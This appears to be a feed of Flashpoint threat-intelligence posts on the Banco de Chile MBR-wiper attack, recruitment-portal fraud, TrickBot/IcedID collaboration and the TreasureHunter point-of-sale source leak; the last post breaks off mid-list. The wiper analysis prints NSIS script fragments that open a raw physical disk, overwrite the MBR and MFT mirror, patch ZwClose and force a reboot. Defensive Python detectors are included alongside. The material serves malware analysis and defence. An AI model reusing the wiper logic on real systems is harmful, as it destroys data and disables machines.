Banco de Chile ‘MBR Killer’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks

Wiper malware that may have destroyed as many as 9,000 workstations and 500 servers inside the Banco de Chile in a late-May attack has similarities to the Buhtrap malware component known as MBR Killer, leaked to the underground in February 2016.

Analysts at Flashpoint reverse-engineered the malware linked to the May 24 attack against the country’s largest financial institution and found it to be a modified version of an MBR Killer module known as kill_os. MBR Killer infections render the local operating system and the Master Boot Record unreadable.

According to bank officials, however, the wiper malware was just cover for a deeper attack against endpoints handling sensitive transactions and messaging over the SWIFT network. The SWIFT banking network, or the Society for Worldwide Interbank Financial Telecommunication, is the primary means of secure, reliable communications and money transfers between financial institutions.

On Sunday, Banco de Chile general manager Eduardo Ebensperger said in a statement that customer accounts were not affected, but that critical processes such as branch services and telephone banking were impacted, as were executive offices and cashier personnel. Ebensperger told Chilean media outlet Pulso that $10 million was stolen and that the funds were routed to entities in Hong Kong. He added that a forensic analysis conducted by Microsoft concluded this was an “international attack” and attributed it to either Eastern European or Asian groups.

Buhtrap malware and its components, including MBR Killer, were previously used in attacks against multiple Russian financial institutions, resulting in losses of 97 million rubles, or $1.23 million USD. The attacks in Russia forced one bank to disconnect from the Russian electronic payment system.

The attack in Chile comes on the heels of incidents affecting several Mexican banks that use the country’s Sistema de Pagos Electrónicos Interbancarios (SPEI) interbank transfer system, resulting in approximately $15.4 million USD in losses. In January, Flashpoint was aware of a separate malware attack targeting Mexican financial institutions that followed a pattern similar to previous attacks, with possible attribution to North Korean malware. Flashpoint was not able to analyze the malware in that case, though the FBI associated the attack with North Korean malware. A report from El Financiero, a Mexican financial publication, following the January incident identified the malware as “FALLCHILL,” a North Korean remote administration tool (RAT) used against aerospace, telecommunications, and financial organizations.

At this time, there does not appear to be a connection between attacks against Mexico’s banking institutions and the purported attack on Banco de Chile because the tactics, techniques, and procedures (TTP) used by the threat actors differ.

The similarities between the malicious code used in Chile and the leaked code from 2016 are in the use of the same NSIS script, below, in both instances. NSIS, or Nullsoft Scriptable Install System, is an open source system used to build Windows installers.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

By and large, the Buhtrap malware is complex and includes more than a dozen modules that give attackers the ability to install more malicious code, retain remote control over a compromised machine, and steal credentials, among other capabilities. A list of available modules follows:

• “BHO”: a module designed to intercept and replace pages in the Internet Explorer browser.

• “kill_os”: a module designed to erase the MBR.

• “Loaders”: builders of NSIS scripts designed to install malware.

• “Mimimod”: a modified version of the “Mimikatz” program, used to obtain user credentials in the system.

• “ID”: an algorithm for obtaining the unique number of the infected machine.

• “BSShide”: a module designed to hide payment orders in the Business Support Systems (BSS). It modifies the page displayed to the user. SWIFT is part of the BSS.

• “Antidetekt”: a module designed to detect virtual environments and “sandboxes.”

• “UAC”: a module to bypass the User Account Control (UAC) protection.

• “RDP”: patches the OS so that several users can be logged on simultaneously (concurrent Remote Desktop sessions).

• “VNC”: remote PC control with backconnect.

• “DLL Side-Loading”: used to install a keylogger and to provide communication with the control panel. Enables installation and operation of other modules in the system.

• “Control panel”: used to maintain visibility into infections and install additional modules to the infected host.

• “Builder”: a program designed to collect Trojan modules in one executable file.

• “MWI”: a collection of exploits, part of the “Microsoft Word Intruder” tool that was available on the underground.

The Banco de Chile MBR Killer was also packed with VMProtect to hinder forensic analysis and reverse engineering. The malware does not select its victims by locale or language, although a Spanish language and locale check is present in the code. Attribution remains uncertain: it is unclear whether the code was simply reused by a copycat group or whether the attack is linked to the original group behind Buhtrap. In the Buhtrap campaigns, the kill_os module was used to destroy evidence after a successful bank network penetration.

Banco De Chile: Malware Technical Analysis

The malware is packed with VMProtect and built with NSIS; the NSIS script reaches the Windows API through the System plugin (System.dll), which the installer extracts to %TEMP% at run time.

I. Main loop: CreateFile API opening \\.\PHYSICALDRIVE0 for raw read/write access:

Function main_loop_CreateFile
    IntFmt $1 "\\.\PHYSICALDRIVE%d" $0
    Push $0
    StrCpy $0 $1
    ; raw handle to the physical disk is returned in $2
    System::Call "KERNEL32::CREATEFILE(t, i, i, i, i, i, i) i ('$0', ${GENERIC_READ}|${GENERIC_WRITE}, ${FILE_SHARE_READ}|${FILE_SHARE_WRITE}, ${NULL}, ${OPEN_EXISTING}, ${FILE_ATTRIBUTE_NORMAL}, ${NULL}) .r2"
    Pop $0
FunctionEnd

II. Master boot record setup:

; 446-byte bootstrap, 64 bytes of partition table (read byte by byte), 2-byte signature
!define STMBR '(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i2) i'

III. MBR with logical block addressing (four 16-byte partition entries, each ending in the 4-byte LBA start and sector count):

!define STMBRLBA '(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i2) i'

IV. Volume boot record NTFS:

; jump, OEM ID, bytes/sector, sectors/cluster, reserved sectors, 24 bytes skipped,
; total sectors, $MFT cluster, $MFTMirr cluster, clusters per MFT record
!define STVBR_NTFS '(&i3, &i8, &i2, &i1, &i2, &i24, &i8, &i8, &i8, &i4) i'

V. Overwriting the NTFS boot structures. The script overwrites, in order:

Overwrite MBR
Overwrite Master File Table (MFT) mirror
Overwrite Volume Boot Record (VBR) mirror
Overwrite Extended Boot Record (EBR)

The following system API calls perform the overwrite; $2 is the \\.\PHYSICALDRIVE handle opened in step I:

${ForEach} $7 1 ${OVERWRITE_COUNT} + 1
    ; seek the raw disk handle to the target offset
    System::Call "kernel32::SETFILEPOINTER(i, i, *p, i) i (r2, r4, r3, ${FILE_BEGIN}) .r8"
    ${If} $8 <> -1
        ; write the overwrite buffer and force it to disk
        System::Call "kernel32::WRITEFILE(i, i, i, p, i) i (r2, r5, r9, r6, ${NULL})"
        System::Call "kernel32::FlushFileBuffers(i) i (r2)"
    ${EndIf}
${Next}
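As an added example (not code from the Flashpoint post or from the kill_os script), the following Python parser reads an MBR and an NTFS boot sector using the same field layouts the script declares as STMBRLBA and STVBR_NTFS, computes where the $MFTMirr sectors that the wiper targets live, and reports the anomalies an analyst would check for on a disk image pulled from an affected host. The sample sectors are constructed for the demonstration, and the wiped case assumes the overwrite buffer was zeros; the script's actual buffer contents are not shown on this page.

```python
import struct

# Added example (not code from the Flashpoint post or the kill_os script): parser for the
# structures the NSIS script declares as STMBRLBA and STVBR_NTFS, plus a check that tells
# an intact boot sector from one the wiper has overwritten. Sample sectors are constructed;
# the wiped sample is assumed to be all zero.

SECTOR = 512
MBR_SIGNATURE = 0xAA55
# One 16-byte partition entry: status, CHS start, type, CHS end, LBA start, sector count
PART_ENTRY = struct.Struct("<B3sB3sII")
# NTFS boot sector as STVBR_NTFS reads it: jump, OEM ID, bytes/sector, sectors/cluster,
# reserved sectors, 24 bytes skipped, total sectors, $MFT LCN, $MFTMirr LCN,
# clusters per MFT record (read as 4 bytes, as in the script)
NTFS_BPB = struct.Struct("<3s8sHBH24sQQQI")


def parse_mbr(sector):
    """Split a 512-byte MBR into bootstrap code, four partition entries and the signature."""
    if len(sector) != SECTOR:
        raise ValueError("MBR must be one 512-byte sector")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba, count = PART_ENTRY.unpack_from(sector, 446 + 16 * i)
        partitions.append({"status": status, "type": ptype, "lba_start": lba, "sectors": count})
    (signature,) = struct.unpack_from("<H", sector, 510)
    return {"bootstrap": sector[:446], "partitions": partitions, "signature": signature}


def parse_ntfs_vbr(sector):
    """Read the NTFS boot-sector fields the wiper needs to locate $MFT and $MFTMirr."""
    _, oem, bps, spc, _, _, total, mft_lcn, mftmirr_lcn, _ = NTFS_BPB.unpack_from(sector, 0)
    return {"oem": oem, "bytes_per_sector": bps, "sectors_per_cluster": spc,
            "total_sectors": total, "mft_lcn": mft_lcn, "mft_mirror_lcn": mftmirr_lcn}


def mft_mirror_lba(vbr, partition_lba):
    """Absolute sector of $MFTMirr: partition start + cluster number * sectors per cluster."""
    return partition_lba + vbr["mft_mirror_lcn"] * vbr["sectors_per_cluster"]


def boot_sector_findings(mbr_sector, vbr_sector):
    """Return a list of anomalies; an empty list means both sectors look intact."""
    findings = []
    mbr = parse_mbr(mbr_sector)
    if mbr["signature"] != MBR_SIGNATURE:
        findings.append("MBR signature 0x%04X, expected 0xAA55" % mbr["signature"])
    if not any(mbr["bootstrap"]):
        findings.append("MBR bootstrap code is all zero")
    if not any(p["type"] for p in mbr["partitions"]):
        findings.append("MBR partition table is empty")
    vbr = parse_ntfs_vbr(vbr_sector)
    if vbr["oem"] != b"NTFS    ":
        findings.append("VBR OEM ID is %r, not NTFS" % vbr["oem"])
    if vbr["bytes_per_sector"] not in (512, 1024, 2048, 4096):
        findings.append("VBR bytes per sector is %d" % vbr["bytes_per_sector"])
    if vbr["mft_lcn"] == 0 or vbr["mft_mirror_lcn"] == 0:
        findings.append("VBR $MFT/$MFTMirr cluster numbers are zero")
    return findings


def build_sample_mbr(partition_lba=2048, sectors=204800):
    """Constructed MBR: non-zero bootstrap, one bootable NTFS (type 0x07) partition, valid signature."""
    bootstrap = bytes([0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C]).ljust(446, b"\x90")
    entry = PART_ENTRY.pack(0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", partition_lba, sectors)
    return bootstrap + entry + b"\x00" * 48 + struct.pack("<H", MBR_SIGNATURE)


def build_sample_ntfs_vbr(total_sectors=204799):
    """Constructed NTFS boot sector: 512-byte sectors, 8 sectors per cluster, $MFTMirr at cluster 2."""
    bpb = NTFS_BPB.pack(b"\xEB\x52\x90", b"NTFS    ", 512, 8, 0, b"\x00" * 24,
                        total_sectors, 786432, 2, 0xF6)
    return bpb.ljust(510, b"\x00") + struct.pack("<H", MBR_SIGNATURE)


if __name__ == "__main__":
    print("intact:", boot_sector_findings(build_sample_mbr(), build_sample_ntfs_vbr()) or "no findings")
    print("wiped:", boot_sector_findings(b"\x00" * SECTOR, b"\x00" * SECTOR))
```

On a real image, feed `parse_mbr` the first sector, `parse_ntfs_vbr` the sector at each partition's `lba_start`, and compare `mft_mirror_lba` against the sectors the script seeks to; a wiped host shows the signature, bootstrap and partition-table findings together, whereas a single bad field usually points at something other than this wiper.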

VI. Process protection. The script resolves ZwClose in ntdll.dll, makes its first six bytes writable, saves and overwrites them, calls CloseHandle on the bogus handle 0x12345678, and then restores the original bytes:

System::Call "KERNEL32::GETMODULEHANDLE(t) p ('ntdll.dll') .r0"
${If} $0 <> ${NULL}
    System::Call "KERNEL32::GETPROCADDRESS(p, t) p (r0, 'ZwClose') .r1"
    ${If} $1 <> ${NULL}
        ; make the first 6 bytes of ZwClose writable
        System::Call "KERNEL32::VIRTUALPROTECT(p, i, i, *i) i (r1, 6, ${PAGE_EXECUTE_READWRITE}, .r2) .r0"
        ${If} $0 <> 0
            System::Alloc 6
            Pop $3
            System::Call "NTDLL::MEMCPY(p, p, i) i (r3, r1, 6)"        ; save the original bytes
            System::Call "NTDLL::MEMCPY(p, t, i) i (r1, t '1', 6)"     ; overwrite them
            System::Call "KERNEL32::CLOSEHANDLE(i) i (0x12345678) .r4" ; CloseHandle on a bogus handle
            System::Call "NTDLL::MEMCPY(p, p, i) i (r1, r3, 6)"        ; restore ZwClose
            System::Free $3
        ${EndIf}
    ${EndIf}
${EndIf}

VII. Forced system reboot (ExitWindowsEx with EWX_REBOOT|EWX_FORCE):

Function ExitWindowsEx_EWX_REBOOT_
    Push $1
    StrCpy $1 ${EWX_REBOOT}|${EWX_FORCE}
    System::Call "USER32::EXITWINDOWSEX(i, i) i ($1, ${SHTDN_REASON_MAJOR_SOFTWARE}|${SHTDN_REASON_MINOR_UPGRADE}) .r0"
    Pop $1
FunctionEnd

Possible actions:

As the Banco de Chile MBR Killer code is identical, with minor modifications, to the Buhtrap MBR Killer, reviewing existing mitigations against the Buhtrap malware may help reduce exposure to this threat.
Review, and where possible block, any executable launched from the %TEMP% directory, particularly one that loads “System.dll” (the NSIS System plugin) from there.
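To turn the two review items above into something that can run against endpoint telemetry, here is an added Python example (not from the post, and not Flashpoint's detection content) that classifies constructed Sysmon-style process-create and image-load events. It assumes NSIS extracts its plugins, System.dll included, to a %TEMP%\ns<xxxx>.tmp folder and uses that directory name as a second signal; the paths, PIDs and event schema are made up for the demo.

```python
import re

# Added example, not from the Flashpoint post: detection logic for the review items above,
# run over constructed Sysmon-style events (EventID 1 = process create, 7 = image load).
# Assumption: NSIS unpacks its plugins, System.dll included, into %TEMP%\ns<xxxx>.tmp, so
# that folder name is used as a second signal. Paths and PIDs below are made up.

TEMP_DIR_RE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\appdata\\local\\temp|[a-z]:\\windows\\temp)\\", re.IGNORECASE)
NSIS_SYSTEM_DLL_RE = re.compile(r"\\ns[a-z0-9]{1,7}\.tmp\\system\.dll$", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "image": r"C:\Users\teller\AppData\Local\Temp\swift_update.exe"},
    {"id": 7, "pid": 4120, "image": r"C:\Users\teller\AppData\Local\Temp\swift_update.exe",
     "loaded": r"C:\Users\teller\AppData\Local\Temp\nsa2C4.tmp\System.dll"},
    {"id": 1, "pid": 5108, "image": r"C:\Program Files\Vendor\Setup.exe"},
    {"id": 7, "pid": 5108, "image": r"C:\Program Files\Vendor\Setup.exe",
     "loaded": r"C:\Users\teller\AppData\Local\Temp\nsk1F2.tmp\System.dll"},
    {"id": 7, "pid": 7732, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},
]


def classify_event(event):
    """Return (severity, reason) for one event, or None when it matches neither rule."""
    image_in_temp = bool(TEMP_DIR_RE.match(event["image"]))
    loads_nsis_system = event["id"] == 7 and bool(NSIS_SYSTEM_DLL_RE.search(event["loaded"]))
    if image_in_temp and loads_nsis_system:
        return "high", "process running from %TEMP% loaded the NSIS System plugin from %TEMP%"
    if loads_nsis_system:
        # Every NSIS installer does this, so on its own it is a baselining signal, not an alert.
        return "medium", "NSIS System plugin loaded from %TEMP%"
    if image_in_temp and event["id"] == 1:
        return "low", "process image started from %TEMP%"
    return None


def scan(events):
    """Run the classifier over a stream of events and collect the ones worth a look."""
    alerts = []
    for event in events:
        verdict = classify_event(event)
        if verdict:
            alerts.append({"pid": event["pid"], "severity": verdict[0],
                           "reason": verdict[1], "image": event["image"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["pid"], alert["image"], "-", alert["reason"])
```

The high-severity rule is the one that matches the Banco de Chile sample: an executable living in %TEMP% that then loads the NSIS System plugin from a sibling ns*.tmp folder. Legitimate installers trip the medium rule constantly, which is why the two signals are combined rather than alerted on separately.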

To download the MBR Killer indicators of compromise (IOCs), click here.

The post Banco de Chile ‘MBR Killer’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Targeting Popular Job Recruitment Portals About More Than PII

Job listing and recruitment portals have been an attraction for cybercriminals given the volume of personal information uploaded to those sites in the form of resumes, cover letters and other data specific to individuals.

But there’s more to criminals’ interest than just stealing personally identifiable information. Security shortcomings on some of these sites can expose job applicants, business account holders and the recruiters themselves to a number of different threats. For example, when threat actors gain access to legitimate business accounts at recruiting sites, they can use social engineering to con job seekers into replying to phony listings; the job seekers are then recruited as money mules, or lured into money laundering operations, without knowing it. Malicious documents disguised as a PDF application can also slip past lax or non-existent scanning tools and target the recruitment portal directly, or give an attacker access to data stored on the portal and expose applicants to identity theft.

Flashpoint analysts have noticed a marginal increase in the number of mentions on Deep & Dark Web forums related to such activity around recruitment portals, many of which involve advertisements for the availability of compromised accounts, or criminals soliciting business accounts in order to list jobs on the platforms. Attackers want access to business accounts in order to leverage their phony job listings and recruit people who would ultimately participate in fraud without their knowledge.

It’s likely that most of the recruitment portals are either unaware of such activity, or hesitant to disclose it, meaning that analysts may not have a true handle on the full scope of the problem. Given the increasing number of mentions and interest in abusing these platforms, threat actors may find this to be a useful tactic going forward.

The recruitment of unwitting mules is a growing problem on a number of online platforms that accept classified ads, but most prominently on job recruitment portals. Desperate for employment, a candidate may think they’re applying for a legitimate position. In actuality, the nonexistent positions—typically for merchandise handlers or payment processors—are a means of recruiting unwitting applicants into performing activity that facilitates fraud schemes, such as money laundering, by receiving unauthorized transfers of funds and sending the funds on to other recipients, typically for a nominal fee, frequently 10% of the amount they receive. The applicants are likely to believe the position is more credible if it is posted by a reputable company on a popular recruitment platform.

The phony job solicitations are professionally written and appear legitimate to casual observers and, at times, to the actual business, which may have numerous satellite offices and be unaware of where a local office or contractor could be listing a job.

When it comes to targeting recruitment professionals, Flashpoint analysts have observed that threat actors typically go after such employees via email phishing campaigns rather than attacking the recruitment portals, given the continued success of phishing schemes. Credential stuffing, or account checking, is the more viable route to recruitment portal accounts. Credential stuffing attacks leverage the hundreds of millions of breached and leaked credentials available on the Deep & Dark Web (DDW) and the surface web to gain unauthorized access to accounts. Attackers use automated login requests to repeatedly try username-password combinations until they gain access to an account; the tactic has advantages over malware-laced PDF documents, which may never be downloaded or could be flagged by a scanner.
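The credential stuffing pattern described above is easy to spot in login telemetry once you count distinct usernames per source rather than failures per account. The following Python is an added example, not part of the Flashpoint post; its log format, IP addresses and user names are constructed, and the thresholds (ten distinct accounts within five minutes, 80% failures) are assumptions to be tuned to the portal's own traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Added example, not from the Flashpoint post: flag credential stuffing against a portal's
# login endpoint. The log format, IP addresses and user names are constructed for the demo;
# the thresholds are assumptions.

LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$")


def build_sample_log():
    """Constructed login events: one source cycling through many accounts, one ordinary user."""
    lines = []
    base = datetime(2018, 6, 10, 12, 0, 0)
    # Credential stuffing: one IP, twelve different accounts in twelve seconds, one hit.
    targets = ["alice", "bob", "carol", "dan", "erin", "frank", "grace", "jill",
               "heidi", "ivan", "judy", "mallory"]
    for i, user in enumerate(targets):
        result = "ok" if user == "jill" else "fail"
        stamp = (base + timedelta(seconds=i)).isoformat()
        lines.append("%sZ src=203.0.113.7 user=%s result=%s" % (stamp, user, result))
    # A legitimate user mistyping a password twice, then logging in.
    for i, result in enumerate(["fail", "fail", "ok"]):
        stamp = (base + timedelta(seconds=30 + i)).isoformat()
        lines.append("%sZ src=198.51.100.4 user=dave result=%s" % (stamp, result))
    return lines


def parse_line(line):
    """Return (timestamp, source, user, result) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group("src"), m.group("user"), m.group("result")


def detect_credential_stuffing(lines, window=timedelta(minutes=5),
                               min_distinct_users=10, min_fail_ratio=0.8):
    """Sliding window per source IP: many different accounts, mostly failing, from one place."""
    recent = defaultdict(deque)   # src -> (ts, user, result) tuples inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, user, result = rec
        q = recent[src]
        q.append((ts, user, result))
        while q and ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u, _ in q}
        failures = sum(1 for _, _, r in q if r == "fail")
        if len(users) >= min_distinct_users and failures / len(q) >= min_fail_ratio:
            # keep the latest picture of the source, including which accounts it got into
            flagged[src] = {"attempts": len(q), "distinct_users": len(users), "failures": failures,
                            "compromised": sorted(u for _, u, r in q if r == "ok")}
    return flagged


if __name__ == "__main__":
    for src, info in detect_credential_stuffing(build_sample_log()).items():
        print(src, info)
```

The "compromised" list is the actionable output: those are the accounts whose passwords were already valid, so they need a forced reset and a review of any listings posted from them, not just a block on the source address.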

Job recruitment portals are a warehouse of personal information, and by successfully compromising an applicant’s or recruiter’s account, criminals are able to harvest applicants’ PII, execute social engineering attacks that lead to identity theft, or recruit unwitting mules for fraud.

Flashpoint recommends the following mitigation advice for recruiters and platforms:

• Recruiters should always utilize the document parsers that many recruitment platforms have to avoid being infected by malicious documents.

• Recruiters should enforce employees’ usage of the recruitment platforms, rather than passing around PDF resumes and cover letters.

• Require proper virus scanning of all submitted documents.

• Secure accounts with unique passwords and two-factor authentication in order to deter account takeover.

• Recruiters should work with internal security teams to do cursory research across recruitment sites for fraudulent listings.

• Recruitment portals should implement various security checks that analyze malicious documents and URLs for malicious activity.

• Recruitment portals should always advise users of the risk of accepting third-party documents.

The post Targeting Popular Job Recruitment Portals About More Than PII appeared first on Flashpoint.

Author: Flashpoint

Trickbot and IcedID Botnet Operators Collaborate to Increase Impact

Different banking malware operations previously competed for victims, often seeking out and uninstalling one another upon compromising machines; for example, the SpyEye malware would uninstall Zeus upon infection. Now, in what may indicate a shift toward more collaboration among cybercrime groups, the operators of the IcedID and TrickBot banking Trojans appear to have partnered and are likely sharing profits, based on operation details.

The clincher came when analysts at Flashpoint recently examined samples that indicate computers infected with IcedID are also downloading Trickbot, a prolific piece of malware considered to be the successor to the Dyre banking Trojan.

Researchers first spotted IcedID in November 2017, when IBM’s X-Force research team published a report on this new banking malware spreading via massive spam campaigns. Compromised computers were first infected with the Emotet downloader, which then fetched IcedID from the attacker’s domain; the Russian-speaking cybercriminals behind Emotet are believed to include some of the operators of the Dridex banking Trojan. IcedID is able to maintain persistence on infected machines, and it has targeted companies mainly in the financial services, retail, and technology sectors.

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

It appears that attackers now send IcedID directly as spam, and that piece of malware acts as a downloader that installs TrickBot, which in turn installs other modules on victims’ machines.

While it is unusual to find two different malware families infecting the same machine, Flashpoint analysts have determined, through source intelligence with knowledge of both parties’ operations, that there are indications of extensive collaboration between these two fraud operators. Human fraudsters are central to this cybercrime model: the TrickBot operators, for example, combine automated attacks with knowledgeable fraud operators who review compromised data from victims’ machines and can carry out real-time account takeover (ATO) operations.

Trickbot and IcedID Fraud Master Collaboration: Monetization Funnel

Even the most sophisticated cybercriminal organization cannot reap financial rewards without the human resources required to cash out victims’ bank accounts. Cybercriminals’ ability to profit from the products and services involved in financial fraud rests on the availability of fraud masters, money mules, and related services.

The TrickBot and IcedID collaboration gives this pairing significant capabilities. First, the attacks are complex; while the malware’s main capabilities are its use of token grabbers, redirection attacks, and webinjects to steal banking credentials, there are other modules at the operators’ disposal that allow them to have deep coverage of a victim’s machine and expand the breadth and scope of an attack, thereby allowing them to derive additional potential sources of profit from a successful compromise.

Key to this complete coverage is the ability to carry out account checking, or credential stuffing, in order to determine the value of a victim’s machine and their access. Attackers can leverage higher value targets for network penetration, for example, while attackers can use other compromised targets for cryptocurrency mining.

IcedID has been in the wild since April 2017 and was originally known as BokBot; this malware is exclusively a threat to Windows. Emotet was associated with this malware, and operators used it mainly as a loader and to maintain persistence in order to install and execute additional malware, including a virtual network computing (VNC) module for remote management and an antimalware bypass module. IcedID creates proxies that are used to steal credentials for a host of websites that are mainly in financial services, though some sites also correspond to the retail and technology sector. The local proxy intercepts traffic and uses a webinject that steals login data from the victim.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

TrickBot targets victims in a wide swathe of industries by leveraging multiple modules, including leaked exploits, and targets victims for various malicious activities, such as cryptocurrency mining and ATO operations.

Central Command

Linguistic analysis and an investigation into TrickBot and IcedID botnet operations reveal that each botnet campaign belongs to a small group that commissions or buys the banking malware, manages the flow of infections, pays the project’s affiliates (traffic herders, webmasters, mule handlers), and receives the laundered proceeds. Flashpoint assesses with high confidence that a head of operations oversees a complex network of actors who likely know each other only by aliases, even after years of working together. Each segment of the ecosystem, the so-called affiliates, consists of specialists within their respective domains. While they deliver value to the botnet owner, they act independently, employing their own closed networks to accomplish assigned tasks. The organizational complexity of these projects, along with the stringent security practices exercised throughout the supply chain, poses a significant challenge to investigations.

Role of Botmaster in Cybercrime Operations

The responsibility to monitor the botnet, or the sum total of all victims’ online activities, falls on the TrickBot and IcedID botmaster. A bot’s activity is recorded in the command-and-control (C2) database according to the parameters specified in the control panel’s preferences. The botmaster also receives XMPP (Jabber) notifications, enabled via the “jabber_on” field in the backend, when a victim logs in to a banking page of interest. Once the login is recorded, the botmaster passes a message to the fraud masters. The message reads, “Try to log in with: Login AND passcode: at this url: <bank_login_url>.”

The botmaster may elect to receive notifications when a victim accesses only certain online banking applications. If, for example, the project is built around European or US financial institutions (possibly because that is where the syndicate’s money laundering capabilities are focused), they would receive Jabber notifications based on their geographical cash out preference.

The botmaster decodes the logs and parses them for the needed content. Exported logs may contain tens of millions of lines of data, so a botmaster will likely employ a parsing application to extract the relevant data. Advanced banking Trojans such as Citadel have a built-in log parser. Once information consisting of the victim’s login credentials, answers to the secret questions, and email address is extracted from the logs, it is passed on to an affiliate who manages real-world operations.

Geographical disparity presents an obstacle to monetizing access, though this issue is typically solved through money mule (or drop) services. Mules open bank accounts in the victim’s geographic location, at the same financial institution. They receive fraudulent Automated Clearing House (ACH) and wire transfers into their accounts and forward the proceeds to the botnet owner or an intermediary. Higher up the chain, mule handlers direct mule recruiting and money laundering at a range of locations and financial institutions; many mule handlers advertise their services on cybercrime forums.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Based on the close collaboration between the TrickBot and IcedID operators and their shared backend infrastructure, it is likely that the operators will continue to collaborate closely on cashing out stolen accounts.

Such collaboration may also signal that fraud masters and malware developers are continuing to foster collaborative fraud operations targeting corporations in an attempt to bypass the latest anti-fraud measures.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Attachments and Downloads

To download the Indicators of Compromise (IOCs) for TrickBot and IcedID, click here.

To download the Snort rule, click here.

The post Trickbot and IcedID Botnet Operators Collaborate to Increase Impact appeared first on Flashpoint.

Author: Flashpoint

TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked

The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.

The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.

Point-of-sale malware has been at the root of many breaches, including massive thefts at retailers Target in 2013 and Home Depot in 2014; in each case attackers were able to extract more than 100 million payment card and customer records from point-of-sale terminals by scraping card data before it was encrypted and sent to the payment processor. Both retail giants paid tens of millions of dollars in settlements, and in Target’s case, its chief executive officer resigned his position.

Industry Collaboration on Detection and Prevention

TreasureHunter has been known and investigated since 2014, but until now investigators have had to reverse-engineer its code in order to analyze it. Now with the full code available, analysts have previously unseen insight into the malware’s operation. Flashpoint analysts, who discovered the source code leak in March, proactively collaborated with researchers at Cisco Talos, who reviewed and improved protections, and advanced-detection mechanisms, in an effort to disrupt potential copycats who may have their hands on the source code.

In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code. Notably, the original developer appears to be a Russian speaker who is proficient in English. Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.

Image 1: A graphical representation of a typical cybercrime dump shop ecosystem.

One Leak Can Spawn Many Variants

TreasureHunter behaves like many other point-of-sale malware samples. Once an attacker has access to a Windows-based server and the point-of-sale terminal, the malware is installed and it establishes persistence by creating a registry key that runs the malware at startup. It then enumerates running processes, and scans device memory looking for track data, including primary account numbers (PANs), separators, service codes, and more. It then establishes a connection with the attacker’s command and control server and sends the stolen data to the criminal.

The leak of the builder adds another dimension to the availability of the TreasureHunter payload and configurations. In the past, malware source code leaks such as the Zeus banking Trojan have spawned numerous variants, including Citadel, which cost organizations hundreds of millions in losses. PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware which led to the creation of the ProPoS and Katrina variants. The actor behind the TreasureHunter leak said:

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs (not at a very high rate, but it still does) and besides that, since now you have the source code, it can be updated anytime for your own needs.”

For researchers, the availability of the source code opens the door into new avenues of analysis and proactive visibility into such activity on the underground. This affords organizations such as Flashpoint the ability to collaborate with others in the industry such as Cisco Talos in this case to improve existing protections and force attackers back to the drawing board.

Source-Code Level Insight

The code project appears to be called trhutt34C internally, and was written in pure C with no C++ features. It was originally compiled with Visual Studio 2013 on Windows XP. Based on analysis, researchers believe the developer intended to improve and redesign various features, including anti-debugging, code structure, and gate communication logic. With those improvements the developer hoped to frustrate malware analysis and subsequent research; the actor left behind a note that said: “We want the malware researchers screamin’!”

Image 2: A snapshot of the TreasureHunter source code.

The unfinished project included continued improvement code snippets, below:

  • TO DO for the next version of the client (0.2 Beta):
    • Replace all Unicode versions of functions with ANSI versions. Now why did I ever go for wide-char in the first place?..
  • Improve the code structure:
    • Replace all the if – else constructs that are rendered needless by return commands;
    • Organize the includes;
    • Give the code proper commenting so that I am able to modify and improve it after not having seen it for some time (if such a thing happens).
    • Make scan exceptions and service codes configurable.
    • Add the following commands to the gate communication logic:
